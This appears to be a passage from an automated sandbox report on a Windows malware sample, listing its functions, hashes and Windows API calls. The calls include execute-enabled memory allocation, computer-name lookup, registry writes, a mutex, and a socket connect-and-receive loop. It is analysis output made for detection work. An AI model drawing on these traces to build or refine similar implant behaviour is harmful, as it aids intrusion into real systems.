Opcode ID: 752b3a0e50f51bd2d3ade85e82772269ca285cf8a338024118126131bbc19b2f
Instruction ID: b31ae3d2c00b689a18732274ac733728a5ac217e2b8e32b66ac7ab0a489ea8a8
Opcode Fuzzy Hash: 752b3a0e50f51bd2d3ade85e82772269ca285cf8a338024118126131bbc19b2f
Instruction Fuzzy Hash: 43B01275504200EFCF001BF09E1CBC93E64AF4CB02F008414F30D84060C6314800DB16

Uniqueness

Uniqueness Score: -1.00%

Function 00406F77 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000000,00403FDD,75A901C0,?,?,004141D5,75A901C0,?,?,75A901C0,00000000,?,00406AE0,00000000), ref: 00406F7A
RtlAllocateHeap.NTDLL(00000000,?,004141D5,75A901C0,?,?,75A901C0,00000000,?,00406AE0,00000000,?,75A901C0,00000000), ref: 00406F81

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 6c1135db60ce8961bb99149e8205185c5299e2b4f342acf2aa96d73d7bbaaddb
Instruction ID: ae17dce412331f60046ae638324f6dc2d2d930ef1c9b28e571d974c892ed419c
Opcode Fuzzy Hash: 6c1135db60ce8961bb99149e8205185c5299e2b4f342acf2aa96d73d7bbaaddb
Instruction Fuzzy Hash: BAA002B15501109BEE4457B59D1DBD53D18A748701F018558F74D85150D96459448725

Uniqueness

Uniqueness Score: -1.00%

Function 00406E8D Relevance: 2.5, APIs: 2, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00404372,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00406E9B
GetLastError.KERNEL32(?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00406EA7

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AllocErrorLastVirtual
String ID:
API String ID: 497505419-0
Opcode ID: a9fb0ce1e68c495d2db6e7b1a1ec41007abe7d84e6822d76dee28eef672286ff
Instruction ID: d63108bad2e184b2f0f50469aa2ef2f17b18062e7daa7fb2ee0f9e0fa34fefb2
Opcode Fuzzy Hash: a9fb0ce1e68c495d2db6e7b1a1ec41007abe7d84e6822d76dee28eef672286ff
Instruction Fuzzy Hash: 06D05E36B4122037D2311256BC1EFCB2E18CBC1F61F05007AFB04AA2D0DAA55D0182EA

Uniqueness

Uniqueness Score: -1.00%

Function 00415DC4 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

EntryPoint.DBKYOVYK(75A901C2,?,75A901C0,?,?,?,00406B41,75A901C0,?,?,?,?,00000000,.bss,00000000), ref: 00415DDE

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 004043C7: lstrcpyW.KERNEL32(00000000,00000000), ref: 004043EC

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Part of subcall function 00401014: GetProcessHeap.KERNEL32(00000000,00000000,00415E1C,00000000,00000000,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040101A
Part of subcall function 00401014: RtlFreeHeap.NTDLL(00000000,?,75A901C0,00000000), ref: 00401021

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcesslstrcpylstrlen$AllocateEntryPointVirtual
String ID:
API String ID: 3316578571-0
Opcode ID: e362c32a016938d3461b72d4dfff0ae0d35ebb7d259163c2a7aa64cca45169c3
Instruction ID: 005cf756bbcbffaf55f080799eb8b812179e9300541397eb278db3ff7d923e78
Opcode Fuzzy Hash: e362c32a016938d3461b72d4dfff0ae0d35ebb7d259163c2a7aa64cca45169c3
Instruction Fuzzy Hash: 49F062726041047BCB05AF5ADC82EEE76AC9FC9358F00007EFA05F6192DB7C9A4196A9

Uniqueness

Uniqueness Score: -1.00%

Function 00404201 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00404234

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrlen$EnvironmentExpandStringslstrcpy
String ID:
API String ID: 1709970682-0
Opcode ID: b02f19462faa21b37192642e73fc604214cee4a5cd268a3ee940c9a5e61826c7
Instruction ID: 98cc06712a26b77e9c62ce792e55ef87cf4d7bba9607bbf96047ff95cd05668c
Opcode Fuzzy Hash: b02f19462faa21b37192642e73fc604214cee4a5cd268a3ee940c9a5e61826c7
Instruction Fuzzy Hash: E5E0D8F6A0021867DB20A6169C0AFD677ACEBC0308F0400BAFB08F21C0E9749D0686A8

Uniqueness

Uniqueness Score: -1.00%

Function 004139AD Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(00403DBD,00000010), ref: 004139D0

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrlen$ComputerNamelstrcpy
String ID:
API String ID: 461527575-0
Opcode ID: c6ded376def5b6896fde51eaf41a1adf1759da756649ffe9865c584e3519d452
Instruction ID: 3c0d0748d39ffe94be0b00cff2cd21478433e9417fada1d5f6d299677a929af0
Opcode Fuzzy Hash: c6ded376def5b6896fde51eaf41a1adf1759da756649ffe9865c584e3519d452
Instruction Fuzzy Hash: 21E092B2A0410CA7CF00DA95D9089CFBBFC9B88314F100466E501F3140D9B19E4887A4

Uniqueness

Uniqueness Score: -1.00%

Function 00414D25 Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000001,00000001,00000000,?,00000000,?,?,00414F1E,?,?), ref: 00414D44

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a5236fc44b9ce0db86ce7ba3fe7ed036e52ba20d0dad6477824926fbcf574cc1
Instruction ID: 27f1c6819ed78fc4a8240a5431f475393522d86539a271e997f4f45b87449013
Opcode Fuzzy Hash: a5236fc44b9ce0db86ce7ba3fe7ed036e52ba20d0dad6477824926fbcf574cc1
Instruction Fuzzy Hash: F9E01A71610208FEEF14CB618D01FBB76B9DBC8B40F10C069F11296150D6B59E40A621

Uniqueness

Uniqueness Score: -1.00%

Function 004042C5 Relevance: 1.5, APIs: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004045F0: lstrlenW.KERNEL32(75A901C0,0040466F,00417610,?,?,004152FA,00417648,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00417610,?,75A901C0,00000000), ref: 004045F7

lstrcatW.KERNEL32(00000000,75A901C0), ref: 004042F5

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: edf2e1b2a466442e0df48baf2b8d29bd9ccfd627e1a83f7ae04ee13ec0b4063a
Instruction ID: 9c927cb2761ea5dfcda3380120c2308ba7a7f8a67d87c6b905973116198d98bc
Opcode Fuzzy Hash: edf2e1b2a466442e0df48baf2b8d29bd9ccfd627e1a83f7ae04ee13ec0b4063a
Instruction Fuzzy Hash: 92E080722002147BDB116B6AEC849AF775DEFC5364708053BFB05D7352EA355C10D6E5

Uniqueness

Uniqueness Score: -1.00%

Function 0040696E Relevance: 1.5, APIs: 1, Instructions: 23networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414070: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,00413FD0,?,?,00414231,?,75A901C0,00000000,00406ACF,?,75A901C0,00000000), ref: 00414078

WSAStartup.WS2_32(00000002,?), ref: 00406994

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CreateMutexStartup
String ID:
API String ID: 3730780901-0
Opcode ID: 3c59b2afcbb88c50f0d944711beb30a784207b9d58081073b4508ae48c797624
Instruction ID: bd9a0c3c8d6f06a51a5a0b3ccaf7c66f3df847eec849dec62accf33370a3324d
Opcode Fuzzy Hash: 3c59b2afcbb88c50f0d944711beb30a784207b9d58081073b4508ae48c797624
Instruction Fuzzy Hash: A5E0A5B1511B108BD3709F1B9945992FBE8FFD47207400A1FE5E682AA0C7B0A5458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00402746 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0040275B

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 53bcfde01fafb3ae637c185a542857f555b09f34470d17182c1f54c676786020
Instruction ID: b8a8d97427844dd2674d6049a9884997238c86446c02de3bba332d640294674a
Opcode Fuzzy Hash: 53bcfde01fafb3ae637c185a542857f555b09f34470d17182c1f54c676786020
Instruction Fuzzy Hash: C0D05EB31042097FAB059FA8AC10CE77BDCEF18210301843AF985C7100E631DC109BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00413AEC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 0040415D: lstrcatA.KERNEL32(00000000,75A901C0,?,00000000,?,004045D8,00000000,00000000,?,00405EA3,?,?,?,?,?), ref: 00404189

CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 00413B07

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CreateEventlstrcat
String ID:
API String ID: 2275612694-0
Opcode ID: f5e7d3efe3d48a21a029f690bb510523ecfd3ff9c854dac0877ce10494d5dc54
Instruction ID: 820102940f18bf95bfd7a44e64cc1e384697d04b1f209817b8154313303f11d8
Opcode Fuzzy Hash: f5e7d3efe3d48a21a029f690bb510523ecfd3ff9c854dac0877ce10494d5dc54
Instruction Fuzzy Hash: 40D05B722442057BE710AB91DC0AFC6BF55EB51760F008036F655556D0D7715464C794

Uniqueness

Uniqueness Score: -1.00%

Function 00414070 Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,00413FD0,?,?,00414231,?,75A901C0,00000000,00406ACF,?,75A901C0,00000000), ref: 00414078

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 8cc8501ad0f881324be657efd3a614bb92e978e601f3652e5d5c78cb6af4803d
Instruction ID: 1cd7542f3e62c67807c20c6f865b91d232b87d32262100b98ec96ad16799ed27
Opcode Fuzzy Hash: 8cc8501ad0f881324be657efd3a614bb92e978e601f3652e5d5c78cb6af4803d
Instruction Fuzzy Hash: DCD012B19005215FE3249F395C089A7B5DDDF99720315CE3DB4A9C71D4E5308C808760

Uniqueness

Uniqueness Score: -1.00%

Function 00414D63 Relevance: 1.5, APIs: 1, Instructions: 9registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(?,?,00414EE6,?,?,00417742), ref: 00414D6D

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 4a0048dd9d1b4f45de73e0323dbf8f19e075dbec624bee2ed7f2ebda59110bb4
Instruction ID: 41206f06143d924dc1875ee61fb7e582728b5d96c7353d74f956dd64684ace43
Opcode Fuzzy Hash: 4a0048dd9d1b4f45de73e0323dbf8f19e075dbec624bee2ed7f2ebda59110bb4
Instruction Fuzzy Hash: EAC04C31010121CBD7351F14F4057D176E4AB44316F25086ED4C055168D7B90DD0CA48

Uniqueness

Uniqueness Score: -1.00%

Function 004133FB Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SHCreateDirectoryExW.SHELL32(00000000,?,00000000,00414F62,00000000,?,?,?,?,?,75A901C0,00000000), ref: 00413401

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: aa13c86fd54e2c9775f35d0da67c3ce4a65dd49cbcfda09b0710f0f9c98c5f54
Instruction ID: 0d16f84c81ed32f519db7b3e1cc121e9d9ede10325b8a6537682f2c002f8b6b0
Opcode Fuzzy Hash: aa13c86fd54e2c9775f35d0da67c3ce4a65dd49cbcfda09b0710f0f9c98c5f54
Instruction Fuzzy Hash: FFB01230BE920067DE002B708C06F1035159746B07F2045B0F212C90E0C66100005504

Uniqueness

Uniqueness Score: -1.00%

Function 004147A3 Relevance: 1.3, APIs: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,74E2F770,00000000,?,?,?,?,0040AC91), ref: 004147CF

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bb13940f10975badbdd970ff93634848249aabd2d0d36a5e4cd54858b7a51c4a
Instruction ID: c7b979e3eb8ed30ffd198ff2353831d9f98da66a6607c0ab4cb881e4574bffc5
Opcode Fuzzy Hash: bb13940f10975badbdd970ff93634848249aabd2d0d36a5e4cd54858b7a51c4a
Instruction Fuzzy Hash: 5B21F771B00200ABCB15AFA9CC42BBE77E99FC4318F18446EF505EB382D678DD418758

Uniqueness

Uniqueness Score: -1.00%

Function 00405E61 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0040456D: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00405EA3,?,?,?), ref: 00404595
Part of subcall function 0040456D: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00405EA3,?,?,?,?,?), ref: 004045C0

Part of subcall function 00406871: getaddrinfo.WS2_32(75A901C0,00000000,00405EAB,00000000), ref: 004068C6
Part of subcall function 00406871: socket.WS2_32(00000002,00000001,00000000), ref: 004068DD
Part of subcall function 00406871: htons.WS2_32(?), ref: 00406903
Part of subcall function 00406871: freeaddrinfo.WS2_32(00000000), ref: 00406913
Part of subcall function 00406871: LoadLibraryA.KERNEL32(Ws2_32.dll), ref: 0040691E
Part of subcall function 00406871: GetProcAddress.KERNEL32(00000000,connect), ref: 0040692A
Part of subcall function 00406871: WSAConnect.WS2_32(?,?,00000010,00000000,00000000,00000000,00000000), ref: 0040693C

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Sleep.KERNEL32(?,?,?,?,?,?,?,75A901C0,00000000), ref: 00405ED8

Part of subcall function 004066A8: setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 004066DF
Part of subcall function 004066A8: recv.WS2_32(000000FF,?,0000000C,00000000), ref: 00406729
Part of subcall function 004066A8: recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00406795

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWiderecv$AddressConnectFreeLibraryLoadProcSleepVirtualfreeaddrinfogetaddrinfohtonssetsockoptsocket
String ID:
API String ID: 1641826817-0
Opcode ID: 8f22f703d232871976013d67cc682e86016153b98c61e441051a51adb16cdad9
Instruction ID: 511e0cc31e7ee9f412e05160c2c39f138c785f69556261873356b90f633cd0f3
Opcode Fuzzy Hash: 8f22f703d232871976013d67cc682e86016153b98c61e441051a51adb16cdad9
Instruction Fuzzy Hash: 6201C43160010A6BCB08EB75D859BEEF7B8FF50358F01063EE41A63190DB78A924CAD4

Uniqueness

Uniqueness Score: -1.00%

Function 0040C469 Relevance: 1.3, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: fa5685c46b1b98d8568d4b56d61c8680e3ccbe8b5c6debe293bf1e64b1cf3101
Instruction ID: ac8da666b8f158d14e7c0f86d246d5a84e898199090ec2c88cd458fbbe80352f
Opcode Fuzzy Hash: fa5685c46b1b98d8568d4b56d61c8680e3ccbe8b5c6debe293bf1e64b1cf3101
Instruction Fuzzy Hash: D4B09B7034060157DD288B105C55F5532107F80705F5045ACA1469D1D08775A4118D08

Uniqueness

Uniqueness Score: -1.00%

Function 00406F2C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0040467B,00417610,?,?,004152FA,00417648,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00417610,?,75A901C0,00000000), ref: 00406F36

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: daba1420498314996799e3108a0131e41a11699c6cf172612aa6b8099a2b7f23
Instruction ID: 8ee932e19f64a1421922d78d3725cb053b282e2a97662277045eff5b221730a7
Opcode Fuzzy Hash: daba1420498314996799e3108a0131e41a11699c6cf172612aa6b8099a2b7f23
Instruction Fuzzy Hash: 33A002B07D53007EFD6957509D2FF952E589744F16F104154F70DAC0D095E12A44856E

Uniqueness

Uniqueness Score: -1.00%

Function 00406F1D Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: bf6260a9c7f76db28bf04f52a4f334ef5b3fd8e966f961d627e2fd573f5da0e8
Instruction ID: 9b0f17b27a29f2c5eb62d9886c7218a69b2244d26613bd3c9aac9d652b4b5275
Opcode Fuzzy Hash: bf6260a9c7f76db28bf04f52a4f334ef5b3fd8e966f961d627e2fd573f5da0e8
Instruction Fuzzy Hash: 2EA002706D070076ED7457605D5AF8536146740B01F208AA4B241A80E08AF5A4548A5D

Uniqueness

Uniqueness Score: -1.00%

Function 39CF4D90 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb3c31e532d94f798a4af4dfe0c622eb39292e40106877eab6d08620d8093924
Instruction ID: b3364a3dfcce5558002d3ba7a0f6de736d65838b9fbee6caf0b99ef5181b8e46
Opcode Fuzzy Hash: cb3c31e532d94f798a4af4dfe0c622eb39292e40106877eab6d08620d8093924
Instruction Fuzzy Hash: 9E119A75B0021CDBDF10DF69E889ADDB3B5AB88750F0144A5E41AE3250C771AD90CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 39CEFF4C Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a6c5fb8d9ca268008182f063f52c3a7866bce8e790b8761e988fbed0ef69145
Instruction ID: d095a3ec1e098d4a0bc7d85229ed08e77d5f6b2fdfde5c92ee9764f0579fcdb7
Opcode Fuzzy Hash: 0a6c5fb8d9ca268008182f063f52c3a7866bce8e790b8761e988fbed0ef69145
Instruction Fuzzy Hash: 13E0EE7680011CFBCF01AFD48809AEE7FB9EB88320F048845BA15A2010D7758A21EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 39CDA920 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96bf749288d9eace418953bef9d82c7f72e65fce3b4062b4d8188cb5e0dc4733
Instruction ID: 61663e1130397505c6b98448e46b2b6a090d10f01ca446144c55ea7c1e4c3a83
Opcode Fuzzy Hash: 96bf749288d9eace418953bef9d82c7f72e65fce3b4062b4d8188cb5e0dc4733
Instruction Fuzzy Hash: 2FC0023204424DBBDF129E81EC05E9A3F2AAB84760F448411BA19194618673D971AB55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040D379 Relevance: 58.3, APIs: 22, Strings: 11, Instructions: 531stringfileCOMMON

Download Yara Rule

APIs

